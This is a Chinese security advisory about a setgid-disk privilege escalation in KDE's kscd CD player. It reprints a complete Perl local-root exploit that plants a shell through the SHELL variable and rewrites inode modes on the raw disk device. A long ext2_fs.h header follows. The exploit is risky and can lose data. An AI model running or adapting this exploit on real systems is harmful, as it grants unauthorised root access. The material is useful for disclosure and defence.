kscd SHELL 环境变量欺骗漏洞
发布日期:2000-05-17
更新日期:2000-05-31
受影响系统:
KDE KDE 2.0 BETA
不受影响系统:
KDE KDE 1.2
KDE KDE 1.1.1
KDE KDE 1.1
+ SuSE 6.1-6.4
RedHat 6.1
(注:以上两个列表的标题疑似在排版时互换——下文的测试程序说明和 SuSE 升级包针对的都是 KDE 1.x / SuSE 6.1-6.4,请以厂商公告为准。)
描述:
kscd是KDE桌面下的CD播放器软件,是KDE多媒体软件包的一部分。在某些Linux系统下,这个应用程序缺省被设置了setgid 'disk'位。kscd利用'SHELL'环境变量来执行shell,攻击者可以修改SHELL变量的内容,让kscd去执行任意命令,从而可能获得disk组的权限。利用disk组权限,攻击者还可能直接对磁盘设备进行读写,进而获得超级用户的权限。
<* 来源:Sebastian <krahmer@cs.uni-potsdam.de> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets:
# TESO
# security.is
# lam3rz
# 29A
# Mike and Silvio.
#
# Special thanx to
#
# C.P. -- roots, bloody roots }|-]
# Michal Zalewski -- No sex causes what? I can't deciffer the pic ... :PP
#
# Description:
#
# kscd local root exploit. kscd belongs to the KDE multimedia-pack. (stupid)
# As so often with GUI's, kscd is setgid-disk and get's the shell for
# a browser-execution via SHELL-environment variable. So, we set it
# to /tmp/boomshell which will make ext2fs setgid-disk. Then we use
# ext2fs to change /tmp/boomshell to a setuid-root-file via raw-filesystem
# access (we are group disk!). Please make sure you have
#
# a) ext2fs-lib installed (default)
# b) kscd setgid disk (default on SuSE 6.4 f.e.)
# c) a CD in drive (hmmm ...)
# d) /tmp points to a disk where setuid's are allowes (default)
# e) brain and responsibility (unfortunally not default)
#
# Note that the change via ext2fs takes affect after next re-mount (e.g. 'reboot')
# We assume that group disk has GID 6. Change if necessary.
#
#
# Warning: You are playing with your filesystem! This can cause data-loss.
# Use a zip-disk for playing! YOU USE IT AT YOUR OWN RISK!
# For educational purposes only!
#
# This exploit goes under the GPL!
#
# Print the one-line invocation help on stdout and terminate with status 0.
sub usage
{
	my $help = "Usage: $0 <device_where_tmp_is (/dev/hdaX)>\n";
	print $help;
	exit 0;
}
# Driver script for the proof of concept described in the header above.
#
# Reading guide for defenders -- the chain only works while all of these hold,
# and each one is a place to break it:
#   * kscd is installed setgid 'disk';
#   * kscd runs the program named in the caller's SHELL variable while it
#     still holds that group;
#   * group 'disk' can write to the block device that holds /tmp;
#   * /tmp is on a filesystem mounted with setuid files allowed.
# The vendor fix listed on this page is the updated kmulti package.

# Block device holding /tmp, taken from the command line (usage() exits if absent).
$disk = shift or usage();
# Path of the invoking user's kscd configuration file.
$kde = $ENV{'HOME'}."/.kde/share/config/kscdrc";
# The existing configuration is deleted without a backup and rewritten below.
unlink $kde;
# Builds the helper from ext2fs.c in the current directory. The compiler's
# output and exit status are discarded, so a failed build is not noticed here.
`cc ext2fs.c -lext2fs -o /tmp/ext2fs`;
# create kscd config-file -- necessary
open O, ">$kde" or die "Can't open config-file of kscd!\n";
print O<<_EOF_;
# KDE Config File
[SMTP]
enabled=true
serverHost=localhost
serverPort=25
[CDDB]
CurrentServer=www.cddb.com cddbp 8880 -
HTTPProxyHost=
CDDBRemoteEnabled=0
SeverList=www.cddb.com cddbp 8880 -,
CDDBHTTPProxyEnabled=0
HTTPProxyPort=0
LocalBaseDir=/opt/kde/share/apps/kscd/cddb/
[MAGIC]
magicwidth=320
magicheight=200
magicbrightness=3
[General]
ToolTips=1
RandomPlay=0
DOCKING=1
AUTOPLAY=0
CDDevice=/dev/cdrom
CustomBroserCmd=
BackColor=0,0,0
AUTODOCK=0
Volume=40
EJECTONFINISH=0
USEKFM=0
STOPEXIT=1
LEDColor=226,224,255
UnixMailCommand=owned
_EOF_
close O;
# drop boomshell
# The C source written below has two modes: when its real uid is not 0 it
# changes /tmp/ext2fs to group 6 (assumed to be 'disk', see the header) with
# mode 02755 and returns; when the real uid is 0 it executes /bin/bash.
open O, ">/tmp/boomshell.c" or die "Can't open /tmp/boomshell!\n";
print O<<_EOF_;
#include <stdio.h>
int main()
{
char *a[] = {
"/bin/bash",
NULL
};
setuid(0);
setgid(0);
/* in case we are invoked by kscd */
if (getuid() != 0) {
chown("/tmp/ext2fs", getuid(), 6);
chmod("/tmp/ext2fs", 02755);
return 0;
}
execve(*a, a, NULL);
return 0;
}
_EOF_
close O;
# As above, the compiler result is not checked.
`cc /tmp/boomshell.c -o /tmp/boomshell`;
$ENV{'PATH'}="/opt/kde/bin:".$ENV{'PATH'};
# Caller-controlled input that kscd trusts: the program it launches as "the
# shell" is whatever this variable names. This is the flaw the advisory covers.
$ENV{'SHELL'}="/tmp/boomshell";
print "Invoking kscd now.\n";
print "Click [i] -> [Information] -> [Ultimate Bandlist]\n";
print "Exit kscd then.\nI will do the rest.\n";
# Runs kscd and waits for the user to close it; its output is discarded.
`kscd`;
print "Execute /tmp/boomshell after next reboot.\n";
# ext2fs should be setgid-disk now, which lets us make a shell suid
# The helper edits the on-disk inode through the block device; per the header
# the new mode only becomes visible after the filesystem is mounted again.
exec "/tmp/ext2fs", $disk, "/tmp/boomshell";
--- ext2_fs.h ---
/*
* linux/include/linux/ext2_fs.h
*
* Copyright (C) 1992, 1993, 1994, 1995
* Remy Card (card@masi.ibp.fr)
* Laboratoire MASI - Institut Blaise Pascal
* Universite Pierre et Marie Curie (Paris VI)
*
* from
*
* linux/include/linux/minix_fs.h
*
* Copyright (C) 1991, 1992 Linus Torvalds
*/
#ifndef _LINUX_EXT2_FS_H
#define _LINUX_EXT2_FS_H
#include <asm/types.h> /* Changed from linux/types.h */
/*
* The second extended filesystem constants/structures
*/
/*
* Define EXT2FS_DEBUG to produce debug messages
*/
#undef EXT2FS_DEBUG
/*
* Define EXT2_PREALLOCATE to preallocate data blocks for expanding files
*/
#define EXT2_PREALLOCATE
#define EXT2_DEFAULT_PREALLOC_BLOCKS 8
/*
* The second extended file system version
*/
#define EXT2FS_DATE "95/08/09"
#define EXT2FS_VERSION "0.5b"
/*
* Debug code
*/
#if 0
#ifdef EXT2FS_DEBUG
# define ext2_debug(f, a...) { \
printk ("EXT2-fs DEBUG (%s, %d): %s:", \
__FILE__, __LINE__, __FUNCTION__); \
printk (f, ## a); \
}
#else
# define ext2_debug(f, a...) /**/
#endif
#endif
/*
* Special inodes numbers
*/
#define EXT2_BAD_INO 1 /* Bad blocks inode */
#define EXT2_ROOT_INO 2 /* Root inode */
#define EXT2_ACL_IDX_INO 3 /* ACL inode */
#define EXT2_ACL_DATA_INO 4 /* ACL inode */
#define EXT2_BOOT_LOADER_INO 5 /* Boot loader inode */
#define EXT2_UNDEL_DIR_INO 6 /* Undelete directory inode */
/* First non-reserved inode for old ext2 filesystems */
#define EXT2_GOOD_OLD_FIRST_INO 11
/*
* The second extended file system magic number
*/
#define EXT2_SUPER_MAGIC 0xEF53
/*
* Maximal count of links to a file
*/
#define EXT2_LINK_MAX 32000
/*
* Macro-instructions used to manage several block sizes
*/
/* Smallest and largest block size in bytes, and log2 of the smallest. */
#define EXT2_MIN_BLOCK_SIZE 1024
#define EXT2_MAX_BLOCK_SIZE 4096
#define EXT2_MIN_BLOCK_LOG_SIZE 10
/*
 * Block size in bytes. In the kernel `s` is the in-memory super block; in
 * user space `s` is a struct ext2_super_block and the size is computed from
 * the on-disk s_log_block_size field.
 * NOTE(review): the user-space form shifts by a value read from disk with no
 * range check. Code that parses an untrusted image should confirm the result
 * lies between EXT2_MIN_BLOCK_SIZE and EXT2_MAX_BLOCK_SIZE before using it;
 * an over-wide shift count is undefined behaviour in C.
 */
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE(s) ((s)->s_blocksize)
#else
# define EXT2_BLOCK_SIZE(s) (EXT2_MIN_BLOCK_SIZE << (s)->s_log_block_size)
#endif
/* Number of ACL entries, and of 32-bit block addresses, that fit in one block. */
#define EXT2_ACLE_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_acl_entry))
#define EXT2_ADDR_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / sizeof (__u32))
/* log2 of the block size; the user-space form adds 10 to s_log_block_size. */
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE_BITS(s) ((s)->s_blocksize_bits)
#else
# define EXT2_BLOCK_SIZE_BITS(s) ((s)->s_log_block_size + 10)
#endif
/*
 * Inode size and first non-reserved inode number. The user-space forms fall
 * back to the EXT2_GOOD_OLD_* constants when s_rev_level is EXT2_GOOD_OLD_REV
 * and otherwise use the values stored in the superblock.
 * EXT2_ADDR_PER_BLOCK_BITS is only defined for the kernel.
 */
#ifdef __KERNEL__
#define EXT2_ADDR_PER_BLOCK_BITS(s) ((s)->u.ext2_sb.s_addr_per_block_bits)
#define EXT2_INODE_SIZE(s) ((s)->u.ext2_sb.s_inode_size)
#define EXT2_FIRST_INO(s) ((s)->u.ext2_sb.s_first_ino)
#else
#define EXT2_INODE_SIZE(s) (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
EXT2_GOOD_OLD_INODE_SIZE : \
(s)->s_inode_size)
#define EXT2_FIRST_INO(s) (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
EXT2_GOOD_OLD_FIRST_INO : \
(s)->s_first_ino)
#endif
/*
* Macro-instructions used to manage fragments
*/
/* Smallest and largest fragment size in bytes, and log2 of the smallest. */
#define EXT2_MIN_FRAG_SIZE 1024
#define EXT2_MAX_FRAG_SIZE 4096
#define EXT2_MIN_FRAG_LOG_SIZE 10
/*
 * Fragment size in bytes and fragments per block. The kernel reads cached
 * values; user space derives them from the on-disk superblock.
 * NOTE(review): s_log_frag_size is declared __s32 in struct ext2_super_block,
 * so the user-space shift count can be negative or over-wide when the value
 * comes from an untrusted image; validate it before using these macros.
 */
#ifdef __KERNEL__
# define EXT2_FRAG_SIZE(s) ((s)->u.ext2_sb.s_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s) ((s)->u.ext2_sb.s_frags_per_block)
#else
# define EXT2_FRAG_SIZE(s) (EXT2_MIN_FRAG_SIZE << (s)->s_log_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / EXT2_FRAG_SIZE(s))
#endif
/*
* ACL structures
*/
/*
 * Four 32-bit fields heading an access control list.
 * NOTE(review): this file does not describe the individual fields; the names
 * suggest a size, two counts and the location of the first entry -- confirm
 * against the ACL code before relying on that reading.
 */
struct ext2_acl_header /* Header of Access Control Lists */
{
__u32 aclh_size;
__u32 aclh_file_count;
__u32 aclh_acle_count;
__u32 aclh_first_acle;
};
/*
 * One entry of an access control list. Entries are chained through
 * acle_next, which per its comment links either the next entry of the same
 * inode or the next free entry. acle_size and acle_pad1 are not documented
 * in this file.
 */
struct ext2_acl_entry /* Access Control List Entry */
{
__u32 acle_size;
__u16 acle_perms; /* Access permissions */
__u16 acle_type; /* Type of entry */
__u16 acle_tag; /* User or group identity */
__u16 acle_pad1;
__u32 acle_next; /* Pointer on next entry for the */
/* same inode or on next free entry */
};
/*
* Structure of a blocks group descriptor
*/
/*
 * Descriptor of one block group: where its block bitmap, inode bitmap and
 * inode table live, plus free/used counters. bg_pad and bg_reserved carry no
 * documented meaning in this file.
 */
struct ext2_group_desc
{
__u32 bg_block_bitmap; /* Blocks bitmap block */
__u32 bg_inode_bitmap; /* Inodes bitmap block */
__u32 bg_inode_table; /* Inodes table block */
__u16 bg_free_blocks_count; /* Free blocks count */
__u16 bg_free_inodes_count; /* Free inodes count */
__u16 bg_used_dirs_count; /* Directories count */
__u16 bg_pad;
__u32 bg_reserved[3];
};
/*
* Macro-instructions used to manage group descriptors
*/
#ifdef __KERNEL__
# define EXT2_BLOCKS_PER_GROUP(s) ((s)->u.ext2_sb.s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s) ((s)->u.ext2_sb.s_desc_per_block)
# define EXT2_INODES_PER_GROUP(s) ((s)->u.ext2_sb.s_inodes_per_group)
# define EXT2_DESC_PER_BLOCK_BITS(s) ((s)->u.ext2_sb.s_desc_per_block_bits)
#else
# define EXT2_BLOCKS_PER_GROUP(s) ((s)->s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_group_desc))
# define EXT2_INODES_PER_GROUP(s) ((s)->s_inodes_per_group)
#endif
/*
* Constants relative to the data blocks
*/
#define EXT2_NDIR_BLOCKS 12
#define EXT2_IND_BLOCK EXT2_NDIR_BLOCKS
#define EXT2_DIND_BLOCK (EXT2_IND_BLOCK + 1)
#define EXT2_TIND_BLOCK (EXT2_DIND_BLOCK + 1)
#define EXT2_N_BLOCKS (EXT2_TIND_BLOCK + 1)
/*
* Inode flags
*/
#define EXT2_SECRM_FL 0x00000001 /* Secure deletion */
#define EXT2_UNRM_FL 0x00000002 /* Undelete */
#define EXT2_COMPR_FL 0x00000004 /* Compress file */
#define EXT2_SYNC_FL 0x00000008 /* Synchronous updates */
#define EXT2_IMMUTABLE_FL 0x00000010 /* Immutable file */
#define EXT2_APPEND_FL 0x00000020 /* writes to file may only append */
#define EXT2_NODUMP_FL 0x00000040 /* do not dump file */
#define EXT2_NOATIME_FL 0x00000080 /* do not update atime */
/* Reserved for compression usage... */
#define EXT2_DIRTY_FL 0x00000100
#define EXT2_COMPRBLK_FL 0x00000200 /* One or more compressed clusters */
#define EXT2_NOCOMP_FL 0x00000400 /* Don't compress */
#define EXT2_ECOMPR_FL 0x00000800 /* Compression error */
/* End compression flags --- maybe not all used */
#define EXT2_BTREE_FL 0x00001000 /* btree format dir */
#define EXT2_RESERVED_FL 0x80000000 /* reserved for ext2 lib */
#define EXT2_FL_USER_VISIBLE 0x00001FFF /* User visible flags */
#define EXT2_FL_USER_MODIFIABLE 0x000000FF /* User modifiable flags */
/*
* ioctl commands
*/
#define EXT2_IOC_GETFLAGS _IOR('f', 1, long)
#define EXT2_IOC_SETFLAGS _IOW('f', 2, long)
#define EXT2_IOC_GETVERSION _IOR('v', 1, long)
#define EXT2_IOC_SETVERSION _IOW('v', 2, long)
/*
* Structure of an inode on the disk
*/
/*
 * On-disk inode. The field order is the disk layout, so it must not be
 * rearranged.
 *
 * Security note: i_mode, i_uid and i_gid are the fields that ext2fs.c on this
 * page overwrites. Whoever can write to the block device can change them
 * directly, without passing the ownership checks that chmod()/chown() apply
 * on a mounted filesystem; write access to a disk device node therefore has
 * to be treated as equivalent to root.
 */
struct ext2_inode {
__u16 i_mode; /* File mode */
__u16 i_uid; /* Owner Uid */
__u32 i_size; /* Size in bytes */
__u32 i_atime; /* Access time */
__u32 i_ctime; /* Creation time */
__u32 i_mtime; /* Modification time */
__u32 i_dtime; /* Deletion Time */
__u16 i_gid; /* Group Id */
__u16 i_links_count; /* Links count */
__u32 i_blocks; /* Blocks count */
__u32 i_flags; /* File flags */
/* One 32-bit word whose meaning depends on the creating OS. */
union {
struct {
__u32 l_i_reserved1;
} linux1;
struct {
__u32 h_i_translator;
} hurd1;
struct {
__u32 m_i_reserved1;
} masix1;
} osd1; /* OS dependent 1 */
__u32 i_block[EXT2_N_BLOCKS];/* Pointers to blocks */
__u32 i_version; /* File version (for NFS) */
__u32 i_file_acl; /* File ACL */
__u32 i_dir_acl; /* Directory ACL */
__u32 i_faddr; /* Fragment address */
/* Second OS-dependent area; the short names are #defined after the struct. */
union {
struct {
__u8 l_i_frag; /* Fragment number */
__u8 l_i_fsize; /* Fragment size */
__u16 i_pad1;
__u32 l_i_reserved2[2];
} linux2;
struct {
__u8 h_i_frag; /* Fragment number */
__u8 h_i_fsize; /* Fragment size */
__u16 h_i_mode_high;
__u16 h_i_uid_high;
__u16 h_i_gid_high;
__u32 h_i_author;
} hurd2;
struct {
__u8 m_i_frag; /* Fragment number */
__u8 m_i_fsize; /* Fragment size */
__u16 m_pad1;
__u32 m_i_reserved2[2];
} masix2;
} osd2; /* OS dependent 2 */
};
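/*
 * Short member names for struct ext2_inode.
 *
 * i_size_high is an alias for i_dir_acl. The remaining names select the
 * variant of the osd1/osd2 unions that matches the platform the header is
 * compiled for (Linux, Hurd or Masix).
 *
 * The Hurd definitions of i_frag and i_fsize used to end in ';', which put a
 * stray semicolon into every expression using them (for example
 * `inode.i_frag = 0` expanded to `inode.osd2.hurd2.h_i_frag; = 0`). The
 * semicolons are removed so all three branches expand to a plain member path.
 */
#define i_size_high i_dir_acl
#if defined(__KERNEL__) || defined(__linux__)
#define i_reserved1 osd1.linux1.l_i_reserved1
#define i_frag osd2.linux2.l_i_frag
#define i_fsize osd2.linux2.l_i_fsize
#define i_reserved2 osd2.linux2.l_i_reserved2
#elif defined(__GNU__)
#define i_translator osd1.hurd1.h_i_translator
#define i_frag osd2.hurd2.h_i_frag
#define i_fsize osd2.hurd2.h_i_fsize
#define i_uid_high osd2.hurd2.h_i_uid_high
#define i_gid_high osd2.hurd2.h_i_gid_high
#define i_author osd2.hurd2.h_i_author
#elif defined (__masix__)
#define i_reserved1 osd1.masix1.m_i_reserved1
#define i_frag osd2.masix2.m_i_frag
#define i_fsize osd2.masix2.m_i_fsize
#define i_reserved2 osd2.masix2.m_i_reserved2
#endif /* defined(__KERNEL__) || defined(__linux__) */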
/*
* File system states
*/
#define EXT2_VALID_FS 0x0001 /* Unmounted cleanly */
#define EXT2_ERROR_FS 0x0002 /* Errors detected */
/*
* Mount flags
*/
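/* Bit values of the mount-option word. */
#define EXT2_MOUNT_CHECK_NORMAL 0x0001 /* Do some more checks */
#define EXT2_MOUNT_CHECK_STRICT 0x0002 /* Do again more checks */
#define EXT2_MOUNT_CHECK (EXT2_MOUNT_CHECK_NORMAL | \
EXT2_MOUNT_CHECK_STRICT)
#define EXT2_MOUNT_GRPID 0x0004 /* Create files with directory's group */
#define EXT2_MOUNT_DEBUG 0x0008 /* Some debugging messages */
#define EXT2_MOUNT_ERRORS_CONT 0x0010 /* Continue on errors */
#define EXT2_MOUNT_ERRORS_RO 0x0020 /* Remount fs ro on errors */
#define EXT2_MOUNT_ERRORS_PANIC 0x0040 /* Panic on errors */
#define EXT2_MOUNT_MINIX_DF 0x0080 /* Mimics the Minix statfs */
/*
 * clear_opt/set_opt clear or set EXT2_MOUNT_<opt> in the lvalue `o`;
 * test_opt yields the masked bit from the kernel super block's option word.
 * The argument and the whole expansion are parenthesized so the macros keep
 * their meaning when used inside a larger expression; used as plain
 * statements they behave exactly as before.
 */
#define clear_opt(o, opt) ((o) &= ~EXT2_MOUNT_##opt)
#define set_opt(o, opt) ((o) |= EXT2_MOUNT_##opt)
#define test_opt(sb, opt) ((sb)->u.ext2_sb.s_mount_opt & \
EXT2_MOUNT_##opt)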
/*
* Maximal mount counts between two filesystem checks
*/
#define EXT2_DFL_MAX_MNT_COUNT 20 /* Allow 20 mounts */
#define EXT2_DFL_CHECKINTERVAL 0 /* Don't use interval check */
/*
* Behaviour when detecting errors
*/
#define EXT2_ERRORS_CONTINUE 1 /* Continue execution */
#define EXT2_ERRORS_RO 2 /* Remount fs read-only */
#define EXT2_ERRORS_PANIC 3 /* Panic */
#define EXT2_ERRORS_DEFAULT EXT2_ERRORS_CONTINUE
/*
* Structure of the super block
*/
/*
 * On-disk super block. The field order is the disk layout, so it must not be
 * rearranged.
 *
 * Every value here is read from the device. The user-space macros in this
 * header (EXT2_BLOCK_SIZE, EXT2_FRAG_SIZE, EXT2_INODE_SIZE, ...) use
 * s_log_block_size, s_log_frag_size, s_rev_level and s_inode_size as stored,
 * so code that opens an image of unknown origin should validate those fields
 * first. NOTE(review): s_magic is presumably compared with EXT2_SUPER_MAGIC
 * by the consumer -- that check is not in this file.
 */
struct ext2_super_block {
__u32 s_inodes_count; /* Inodes count */
__u32 s_blocks_count; /* Blocks count */
__u32 s_r_blocks_count; /* Reserved blocks count */
__u32 s_free_blocks_count; /* Free blocks count */
__u32 s_free_inodes_count; /* Free inodes count */
__u32 s_first_data_block; /* First Data Block */
__u32 s_log_block_size; /* Block size */
__s32 s_log_frag_size; /* Fragment size */
__u32 s_blocks_per_group; /* # Blocks per group */
__u32 s_frags_per_group; /* # Fragments per group */
__u32 s_inodes_per_group; /* # Inodes per group */
__u32 s_mtime; /* Mount time */
__u32 s_wtime; /* Write time */
__u16 s_mnt_count; /* Mount count */
__s16 s_max_mnt_count; /* Maximal mount count */
__u16 s_magic; /* Magic signature */
__u16 s_state; /* File system state */
__u16 s_errors; /* Behaviour when detecting errors */
__u16 s_minor_rev_level; /* minor revision level */
__u32 s_lastcheck; /* time of last check */
__u32 s_checkinterval; /* max. time between checks */
__u32 s_creator_os; /* OS */
__u32 s_rev_level; /* Revision level */
__u16 s_def_resuid; /* Default uid for reserved blocks */
__u16 s_def_resgid; /* Default gid for reserved blocks */
/*
* These fields are for EXT2_DYNAMIC_REV superblocks only.
*
* Note: the difference between the compatible feature set and
* the incompatible feature set is that if there is a bit set
* in the incompatible feature set that the kernel doesn't
* know about, it should refuse to mount the filesystem.
*
* e2fsck's requirements are more strict; if it doesn't know
* about a feature in either the compatible or incompatible
* feature set, it must abort and not try to meddle with
* things it doesn't understand...
*/
__u32 s_first_ino; /* First non-reserved inode */
__u16 s_inode_size; /* size of inode structure */
__u16 s_block_group_nr; /* block group # of this superblock */
__u32 s_feature_compat; /* compatible feature set */
__u32 s_feature_incompat; /* incompatible feature set */
__u32 s_feature_ro_compat; /* readonly-compatible feature set */
__u8 s_uuid[16]; /* 128-bit uuid for volume */
char s_volume_name[16]; /* volume name */
char s_last_mounted[64]; /* directory where last mounted */
__u32 s_algorithm_usage_bitmap; /* For compression */
/*
* Performance hints. Directory preallocation should only
* happen if the EXT2_COMPAT_PREALLOC flag is on.
*/
__u8 s_prealloc_blocks; /* Nr of blocks to try to preallocate*/
__u8 s_prealloc_dir_blocks; /* Nr to preallocate for dirs */
__u16 s_padding1;
__u32 s_reserved[204]; /* Padding to the end of the block */
};
#ifdef __KERNEL__
#define EXT2_SB(sb) (&((sb)->u.ext2_sb))
#else
/* Assume that user mode programs are passing in an ext2fs superblock, not
* a kernel struct super_block. This will allow us to call the feature-test
* macros from user land. */
#define EXT2_SB(sb) (sb)
#endif
/*
* Codes for operating systems
*/
#define EXT2_OS_LINUX 0
#define EXT2_OS_HURD 1
#define EXT2_OS_MASIX 2
#define EXT2_OS_FREEBSD 3
#define EXT2_OS_LITES 4
/*
* Revision levels
*/
#define EXT2_GOOD_OLD_REV 0 /* The good old (original) format */
#define EXT2_DYNAMIC_REV 1 /* V2 format w/ dynamic inode sizes */
#define EXT2_CURRENT_REV EXT2_GOOD_OLD_REV
#define EXT2_MAX_SUPP_REV EXT2_DYNAMIC_REV
#define EXT2_GOOD_OLD_INODE_SIZE 128
/*
* Feature set definitions
*/
/*
 * Feature tests. Each macro yields the bits of `mask` that are set in the
 * matching feature word of the super block reached through EXT2_SB(sb), so
 * the result is non-zero when at least one requested bit is present.
 */
#define EXT2_HAS_COMPAT_FEATURE(sb,mask) \
( EXT2_SB(sb)->s_feature_compat & (mask) )
#define EXT2_HAS_RO_COMPAT_FEATURE(sb,mask) \
( EXT2_SB(sb)->s_feature_ro_compat & (mask) )
#define EXT2_HAS_INCOMPAT_FEATURE(sb,mask) \
( EXT2_SB(sb)->s_feature_incompat & (mask) )
/* Individual feature bits, grouped by the feature word they belong to. */
#define EXT2_FEATURE_COMPAT_DIR_PREALLOC 0x0001
#define EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER 0x0001
#define EXT2_FEATURE_RO_COMPAT_LARGE_FILE 0x0002
#define EXT2_FEATURE_RO_COMPAT_BTREE_DIR 0x0004
#define EXT2_FEATURE_INCOMPAT_COMPRESSION 0x0001
#define EXT2_FEATURE_INCOMPAT_FILETYPE 0x0002
/*
 * Masks of the feature bits declared as supported. Per the note in
 * struct ext2_super_block, an incompat bit the kernel does not know should
 * make it refuse the mount.
 */
#define EXT2_FEATURE_COMPAT_SUPP 0
#define EXT2_FEATURE_INCOMPAT_SUPP EXT2_FEATURE_INCOMPAT_FILETYPE
#define EXT2_FEATURE_RO_COMPAT_SUPP (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER| \
EXT2_FEATURE_RO_COMPAT_LARGE_FILE| \
EXT2_FEATURE_RO_COMPAT_BTREE_DIR)
/*
* Default values for user and/or group using reserved blocks
*/
#define EXT2_DEF_RESUID 0
#define EXT2_DEF_RESGID 0
/*
* Structure of a directory entry
*/
/* Longest file name a directory entry can hold, in bytes. */
#define EXT2_NAME_LEN 255
/*
 * Original directory entry layout with a 16-bit name length.
 * rec_len and name_len are read from disk; NOTE(review): a parser working on
 * an untrusted image has to check them against the enclosing block before
 * following rec_len or reading name -- this header only declares the
 * kernel-side ext2_check_dir_entry(), it does not perform the check.
 */
struct ext2_dir_entry {
__u32 inode; /* Inode number */
__u16 rec_len; /* Directory entry length */
__u16 name_len; /* Name length */
char name[EXT2_NAME_LEN]; /* File name */
};
/*
* The new version of the directory entry. Since EXT2 structures are
* stored in intel byte order, and the name_len field could never be
* bigger than 255 chars, it's safe to reclaim the extra byte for the
* file_type field.
*/
/*
 * Directory entry with the name length narrowed to 8 bits and the freed byte
 * used for file_type (one of the EXT2_FT_* values). As with the older layout,
 * rec_len and name_len come from disk and need bounds checking by the reader.
 */
struct ext2_dir_entry_2 {
__u32 inode; /* Inode number */
__u16 rec_len; /* Directory entry length */
__u8 name_len; /* Name length */
__u8 file_type;
char name[EXT2_NAME_LEN]; /* File name */
};
/*
* Ext2 directory file types. Only the low 3 bits are used. The
* other bits are reserved for now.
*/
#define EXT2_FT_UNKNOWN 0
#define EXT2_FT_REG_FILE 1
#define EXT2_FT_DIR 2
#define EXT2_FT_CHRDEV 3
#define EXT2_FT_BLKDEV 4
#define EXT2_FT_FIFO 5
#define EXT2_FT_SOCK 6
#define EXT2_FT_SYMLINK 7
#define EXT2_FT_MAX 8
/*
* EXT2_DIR_PAD defines the directory entries boundaries
*
* NOTE: It must be a multiple of 4
*/
/* Alignment of directory entries and the matching round-up mask. */
#define EXT2_DIR_PAD 4
#define EXT2_DIR_ROUND (EXT2_DIR_PAD - 1)
/*
 * Record length for a name of name_len bytes: name_len plus 8, rounded up to
 * a multiple of EXT2_DIR_PAD. The 8 presumably accounts for the fixed fields
 * that precede `name` in the directory entry structs (inode, rec_len,
 * name_len/file_type).
 */
#define EXT2_DIR_REC_LEN(name_len) (((name_len) + 8 + EXT2_DIR_ROUND) & \
~EXT2_DIR_ROUND)
#ifdef __KERNEL__
/*
* Function prototypes
*/
/*
* Ok, these declarations are also in <linux/kernel.h> but none of the
* ext2 source programs needs to include it so they are duplicated here.
*/
# define NORET_TYPE /**/
# define ATTRIB_NORET __attribute__((noreturn))
# define NORET_AND noreturn,
/* acl.c */
extern int ext2_permission (struct inode *, int);
/* balloc.c */
extern int ext2_new_block (const struct inode *, unsigned long,
__u32 *, __u32 *, int *);
extern void ext2_free_blocks (const struct inode *, unsigned long,
unsigned long);
extern unsigned long ext2_count_free_blocks (struct super_block *);
extern void ext2_check_blocks_bitmap (struct super_block *);
/* bitmap.c */
extern unsigned long ext2_count_free (struct buffer_head *, unsigned);
/* dir.c */
extern int ext2_check_dir_entry (const char *, struct inode *,
struct ext2_dir_entry_2 *, struct buffer_head *,
unsigned long);
/* file.c */
extern int ext2_read (struct inode *, struct file *, char *, int);
extern int ext2_write (struct inode *, struct file *, char *, int);
/* fsync.c */
extern int ext2_sync_file (struct file *, struct dentry *);
/* ialloc.c */
extern struct inode * ext2_new_inode (const struct inode *, int, int *);
extern void ext2_free_inode (struct inode *);
extern unsigned long ext2_count_free_inodes (struct super_block *);
extern void ext2_check_inodes_bitmap (struct super_block *);
/* inode.c */
extern int ext2_bmap (struct inode *, int);
extern struct buffer_head * ext2_getblk (struct inode *, long, int, int *);
extern struct buffer_head * ext2_bread (struct inode *, int, int, int *);
extern int ext2_getcluster (struct inode * inode, long block);
extern void ext2_read_inode (struct inode *);
extern void ext2_write_inode (struct inode *);
extern void ext2_put_inode (struct inode *);
extern void ext2_delete_inode (struct inode *);
extern int ext2_sync_inode (struct inode *);
extern void ext2_discard_prealloc (struct inode *);
/* ioctl.c */
extern int ext2_ioctl (struct inode *, struct file *, unsigned int,
unsigned long);
/* namei.c */
extern void ext2_release (struct inode *, struct file *);
extern int ext2_lookup (struct inode *, struct dentry *);
extern int ext2_create (struct inode *,struct dentry *,int);
extern int ext2_mkdir (struct inode *,struct dentry *,int);
extern int ext2_rmdir (struct inode *,struct dentry *);
extern int ext2_unlink (struct inode *,struct dentry *);
extern int ext2_symlink (struct inode *,struct dentry *,const char *);
extern int ext2_link (struct dentry *, struct inode *, struct dentry *);
extern int ext2_mknod (struct inode *, struct dentry *, int, int);
extern int ext2_rename (struct inode *, struct dentry *,
struct inode *, struct dentry *);
/* super.c */
extern void ext2_error (struct super_block *, const char *, const char *, ...)
__attribute__ ((format (printf, 3, 4)));
extern NORET_TYPE void ext2_panic (struct super_block *, const char *,
const char *, ...)
__attribute__ ((NORET_AND format (printf, 3, 4)));
extern void ext2_warning (struct super_block *, const char *, const char *, ...)
__attribute__ ((format (printf, 3, 4)));
extern void ext2_put_super (struct super_block *);
extern void ext2_write_super (struct super_block *);
extern int ext2_remount (struct super_block *, int *, char *);
extern struct super_block * ext2_read_super (struct super_block *,void *,int);
extern int init_ext2_fs(void);
extern int ext2_statfs (struct super_block *, struct statfs *, int);
/* truncate.c */
extern void ext2_truncate (struct inode *);
/*
* Inodes and files operations
*/
/* dir.c */
extern struct inode_operations ext2_dir_inode_operations;
/* file.c */
extern struct inode_operations ext2_file_inode_operations;
/* symlink.c */
extern struct inode_operations ext2_symlink_inode_operations;
#endif /* __KERNEL__ */
